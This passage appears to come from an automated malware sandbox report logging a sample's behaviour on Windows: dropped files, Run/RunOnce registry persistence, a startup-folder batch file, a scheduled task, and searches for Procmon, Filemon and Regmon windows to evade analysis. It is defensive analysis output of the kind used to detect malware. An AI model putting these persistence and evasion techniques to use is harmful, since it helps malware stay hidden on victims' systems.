Source: C:\Windows\explorer.exe	File created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\cvxRAgnn.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\TNeBQEiF.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\CFNWwRDq.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\qMYGMWSI.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\pXgQVFeT.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\ZoAIeOtr.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\yyQNbzJv.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\gmoIHdog.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\WDUsXAjy.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\FwENDODk.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\vIZXTCIC.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	File created: C:\Users\user\Desktop\lZGHkaDU.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\rYNynbxj.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\KhRLcxhs.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\aINBpFrP.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\IwlvVjWA.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\hGBASUlD.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\XXhkisgW.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\NjDuyglo.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\DBkeOEgG.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\tSQOebbY.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\cLzjLovK.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\BVPoHZLO.log	Jump to dropped file
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	File created: C:\Users\user\Desktop\YUJsDsvR.log	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 60c1233683.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 50c9f14fb7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e54822fbe.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

Drops script or batch files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013250001\50c9f14fb7.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013249001\60c1233683.exe	Window searched: window name: Regmonclass

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Source: C:\Users\user\Documents\DBFIEHDHII.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 60c1233683.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 60c1233683.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 50c9f14fb7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 50c9f14fb7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e54822fbe.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 5e54822fbe.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
Source: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\{BB52E685-57DB-490D-A4DD-CCF2F7D90D58} {2DD5D29F-1CE3-49E7-8572-9D856412ED59}

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\callmobile.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
